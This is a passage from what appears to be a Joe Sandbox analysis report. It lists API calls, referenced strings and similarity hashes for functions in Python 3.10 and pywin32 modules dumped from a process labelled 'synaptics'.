                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3731BF72620221DFDB01EF68D84474ABFE4FF66321F1001B1F94587266E336D929CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,None is not a valid string in this context), ref: 6BF49082
                                                                                                                                                                                                              • PyUnicode_AsMBCSString.PYTHON310(?), ref: 6BF490B5
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,Expected 'bytes', got '%s',?), ref: 6BF490E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Expected 'bytes', got '%s', xrefs: 6BF490DA
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF4907B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String$FormatUnicode_
                                                                                                                                                                                                              • String ID: Expected 'bytes', got '%s'$None is not a valid string in this context
                                                                                                                                                                                                              • API String ID: 744494611-3206210502
                                                                                                                                                                                                              • Opcode ID: b86e4c1baebc42e15bad162fea8ad57d03d7b3f59db809ac6cba5eea2ce0b04c
                                                                                                                                                                                                              • Instruction ID: 3c459901ce79333c17f93daebdae9ec2218ddce8d4136e573d3e08e371edb8ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b86e4c1baebc42e15bad162fea8ad57d03d7b3f59db809ac6cba5eea2ce0b04c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E31E532A152118FC711DF2CE908A4ABBF4EF96710F0145A4F80087237D735D959CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,OiOOi(ii):MSG param,?,?,?,?,?,?,?), ref: 6BF4AFA0
                                                                                                                                                                                                              • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF4AFB9
                                                                                                                                                                                                              • ?PyWinObject_AsSimplePARAM@@YAHPAU_object@@PAI@Z.PYWINTYPES310(?,?), ref: 6BF4AFCD
                                                                                                                                                                                                              • PyLong_AsVoidPtr.PYTHON310(?), ref: 6BF4AFE1
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6BF4AFF0
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF4AFFA
                                                                                                                                                                                                              • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF4B002
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,WPARAM is simple, so must be an int object (got %s),?), ref: 6BF4B020
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • OiOOi(ii):MSG param, xrefs: 6BF4AF97
                                                                                                                                                                                                              • WPARAM is simple, so must be an int object (got %s), xrefs: 6BF4B019
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_U_object@@$Long_Object_Void$Arg_ClearFormatOccurredParsePtr@@SimpleSizeTuple_
                                                                                                                                                                                                              • String ID: OiOOi(ii):MSG param$WPARAM is simple, so must be an int object (got %s)
                                                                                                                                                                                                              • API String ID: 3010499539-711983125
                                                                                                                                                                                                              • Opcode ID: 4c7a3332de8280fde5ae2fdb3bf86cd1c7e094d290efe8e632bcf6120d062ecb
                                                                                                                                                                                                              • Instruction ID: 283ea051eee70c3db5beb6eb7fb34a181a554b04b02398a9ce47873ebc61cdb4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c7a3332de8280fde5ae2fdb3bf86cd1c7e094d290efe8e632bcf6120d062ecb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC21AF735102029BDB01DE58EC84D9BBBECFF58206B00083AF945C2122E725E61CCBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,O!s#,?,?,?), ref: 6C0A43D2
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C0A43F6
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,__dict__,?,?,?), ref: 6C0A4401
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,%.200s.__dict__ must be a dictionary, not %.200s,?,?), ref: 6C0A4431
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A4440
                                                                                                                                                                                                              • PyDict_Update.PYTHON310(00000000,?), ref: 6C0A4455
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A4466
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
                                                                                                                                                                                                              • String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
                                                                                                                                                                                                              • API String ID: 111561578-4068157617
                                                                                                                                                                                                              • Opcode ID: 41547bc43cdd2a3f7dc656eddd1b162b2358324b3f7bfb034c6000bebaf0fb17
                                                                                                                                                                                                              • Instruction ID: bb5cafa72d7221602702f8cc9640a724d604c6dd176160cfe499061db0d8a7c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41547bc43cdd2a3f7dc656eddd1b162b2358324b3f7bfb034c6000bebaf0fb17
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A21E0B5A04004BFCB01CFD8DE45AD97BB8EF05338F004655E919A3651DB32A961DB85
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyImport_ImportModule.PYTHON310(win32timezone,?,?,?,6BF487A6,?,6BF48B7A,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48025
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(00000000,TimeZoneInfo,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4803A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48051
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(00000000,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4805C
                                                                                                                                                                                                              • PyObject_CallMethod.PYTHON310(00000000,utc,6BF51365,?,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF48076
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4808A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF4809A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Object_$AttrCallImportImport_MethodModuleStringTuple_
                                                                                                                                                                                                              • String ID: TimeZoneInfo$utc$win32timezone
                                                                                                                                                                                                              • API String ID: 4031171350-3909237026
                                                                                                                                                                                                              • Opcode ID: 160d86f98d7fbd1b0355bcaa44cb262b942b08cc0fcc47845224b0a7d93a67e2
                                                                                                                                                                                                              • Instruction ID: f638f8161a76b9aca80023734f374deddb1b5011245ee61ea6b25963913293d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 160d86f98d7fbd1b0355bcaa44cb262b942b08cc0fcc47845224b0a7d93a67e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF110873D20A215BD7205B2CAC40A563BB4FF62771B0403B0ED24912B2E32DD53A9AF6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310 ref: 6BF4722C
                                                                                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(?,?,?,:GetSecurityDescriptorControl), ref: 6BF47246
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetSecurityDescriptorControl - invalid sd,00000000,?,?,:GetSecurityDescriptorControl), ref: 6BF47256
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GetSecurityDescriptorControl, xrefs: 6BF47279
                                                                                                                                                                                                              • (ii), xrefs: 6BF47295
                                                                                                                                                                                                              • :GetSecurityDescriptorControl, xrefs: 6BF47213
                                                                                                                                                                                                              • GetSecurityDescriptorControl - invalid sd, xrefs: 6BF47251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorError@@ParseSecurityTupleU_object@@ValidWin_
                                                                                                                                                                                                              • String ID: (ii)$:GetSecurityDescriptorControl$GetSecurityDescriptorControl$GetSecurityDescriptorControl - invalid sd
                                                                                                                                                                                                              • API String ID: 2327843493-2499011972
                                                                                                                                                                                                              • Opcode ID: f265efad923482c52fcb46453d7177e3aa51f6cb78b10e1b0bb077aa7694e484
                                                                                                                                                                                                              • Instruction ID: ee304a141020ef341bf7aef9329151e19cb6a4ce5cb734e2fb90537628df5876
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f265efad923482c52fcb46453d7177e3aa51f6cb78b10e1b0bb077aa7694e484
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 360184778181006FDB00AB28EC05E9B7BECEF5160AF448468FC4881121F33AD62C8BB3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(?,?,?,?,?,6BF41767,00000000), ref: 6BF473CE
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,6BF41767,00000000), ref: 6BF473E3
                                                                                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 6BF473F8
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF4740E
                                                                                                                                                                                                              • GetSecurityDescriptorLength.ADVAPI32(00000000), ref: 6BF47419
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF4742A
                                                                                                                                                                                                              • GetSecurityDescriptorControl.ADVAPI32(00000000,?,?), ref: 6BF47447
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF4745E
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6BF4746A
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF47474
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF47492
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$DescriptorSecurity$malloc$ControlInitializeLengthReferencememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 349585977-0
                                                                                                                                                                                                              • Opcode ID: 2088ee717af9a152131acebc7a1ef164ce36f6ea346f0f8f16e2f9ef32f90595
                                                                                                                                                                                                              • Instruction ID: 395925b911c644eb235bdeed6564959bd797ba513eef37e26c68bf8fb92a1bb8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2088ee717af9a152131acebc7a1ef164ce36f6ea346f0f8f16e2f9ef32f90595
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F21F5B22112109BEB04EF29DC88B6BBF5CEF92255B00843AF905C6127D739C568C7F2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyObject_New.PYTHON310(6C0B5D90), ref: 6C0A2F15
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A2FC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocObject_
                                                                                                                                                                                                              • String ID: wrong type
                                                                                                                                                                                                              • API String ID: 3074230233-2191655096
                                                                                                                                                                                                              • Opcode ID: e7f30ce801d5ed96d0ea810bb589605e1ed3048bbdcd9ad15ad0d1735a3d381d
                                                                                                                                                                                                              • Instruction ID: 756f449ace41c99d87417c8ddfc65f32d833098231aca57608864858423ce124
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7f30ce801d5ed96d0ea810bb589605e1ed3048bbdcd9ad15ad0d1735a3d381d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D6135713006454FD704CBEAE844B9AB3E5AF8526CF244675E91D8BE12EB32D447CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,OO!,?,?), ref: 6C0AB0AD
                                                                                                                                                                                                              • _PyUnicode_FromId.PYTHON310(6C0B692C), ref: 6C0AB0CC
                                                                                                                                                                                                              • PyObject_VectorcallMethod.PYTHON310(00000000,?,80000002,00000000), ref: 6C0AB0E9
                                                                                                                                                                                                              • _PyObject_GetAttrId.PYTHON310(00000000,6C0B691C), ref: 6C0AB100
                                                                                                                                                                                                              • PyObject_Call.PYTHON310(00000000,?,00000000), ref: 6C0AB115
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0AB12C
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0AB143
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0AB157
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocObject_$Arg_AttrCallFromMethodParseTupleUnicode_Vectorcall
                                                                                                                                                                                                              • String ID: OO!
                                                                                                                                                                                                              • API String ID: 3012979734-3205451899
                                                                                                                                                                                                              • Opcode ID: f50172b389ecbaf3bd4082370dbee4ed53861a112d5808a242d0628b307c7702
                                                                                                                                                                                                              • Instruction ID: 67e021774325f8d9aa1e8bc223c1a77b0d4635c519109c05ca972bde59f2c8bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f50172b389ecbaf3bd4082370dbee4ed53861a112d5808a242d0628b307c7702
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76212B71B04109ABDB00CBE4AD45BDA77FCEB05638F500761EE29D1141EB36D9168795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,?), ref: 6BF49279
                                                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6BF49296
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF492AB
                                                                                                                                                                                                              • SysStringLen.OLEAUT32(?), ref: 6BF492D9
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,None is not a valid string in this context), ref: 6BF492F6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF4931E
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF492EF
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF49313, 6BF49318
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCharErr_FreeMem_Unicode_Wide
                                                                                                                                                                                                              • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.
                                                                                                                                                                                                              • API String ID: 1135021149-2588796395
                                                                                                                                                                                                              • Opcode ID: 57ab33f68169e987c474bdc6faeee9a50b6e84881c5af9df7ae7ea9861f3b186
                                                                                                                                                                                                              • Instruction ID: a225a315b428bc68e9ba63ed7b414416dbb513c8955c87842b14ab79fd429bfd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57ab33f68169e987c474bdc6faeee9a50b6e84881c5af9df7ae7ea9861f3b186
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D217F367102009FDB00DF19D944B5A7BE4FBD6621F448469E948D3226D73ADA2DCB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,can't delete attribute), ref: 6C0A2547
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,bytes expected instead of %s instance,?), ref: 6C0A2571
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • bytes expected instead of %s instance, xrefs: 6C0A256A
                                                                                                                                                                                                              • byte string too long, xrefs: 6C0A2594
                                                                                                                                                                                                              • can't delete attribute, xrefs: 6C0A2540
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatString
                                                                                                                                                                                                              • String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
                                                                                                                                                                                                              • API String ID: 4212644371-1866040848
                                                                                                                                                                                                              • Opcode ID: c928c67d0e0ee076b79073377714252acb99dc548d2e4b90bf3ca75e81bbba43
                                                                                                                                                                                                              • Instruction ID: c24331e563e538afc660405ccbc859bbeb77d66c4a99d67c14ae4cb2bed3bd04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c928c67d0e0ee076b79073377714252acb99dc548d2e4b90bf3ca75e81bbba43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 792138726041009FCB00CFADE94498577F8FF01338B044761F92D97692DB32E565CBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C0A9D89
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 6C0A9D96
                                                                                                                                                                                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0A9DA7
                                                                                                                                                                                                              • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0A9DB4
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0A9DC6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A9DDC
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.seh_exception,6C0B2280,00000000), ref: 6C0A9DF8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_errno$AuditDeallocEval_RestoreSys_Thread
                                                                                                                                                                                                              • String ID: ctypes.seh_exception$exception: single step
                                                                                                                                                                                                              • API String ID: 335390877-1291774189
                                                                                                                                                                                                              • Opcode ID: 45a0d78729a1a231238f8e5bf1f8b97131c7da235eae99125a9ce353901de45c
                                                                                                                                                                                                              • Instruction ID: 7a6621970de565c08bc326217b81af806967b076f9441c072d02c34e10450975
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45a0d78729a1a231238f8e5bf1f8b97131c7da235eae99125a9ce353901de45c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C72145B8B052459FCF01CFE8C948B8D7BF1AF49319F250514E925A7752C732A882CA68
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:GetSecurityDescriptorSacl), ref: 6BF4716C
                                                                                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(?), ref: 6BF47186
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetSecurityDescriptorSacl - invalid sd,00000000), ref: 6BF47196
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • :GetSecurityDescriptorSacl, xrefs: 6BF47163
                                                                                                                                                                                                              • GetSecurityDescriptorSacl, xrefs: 6BF471BE
                                                                                                                                                                                                              • GetSecurityDescriptorSacl - invalid sd, xrefs: 6BF47191
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorError@@ParseSecurityTupleU_object@@ValidWin_
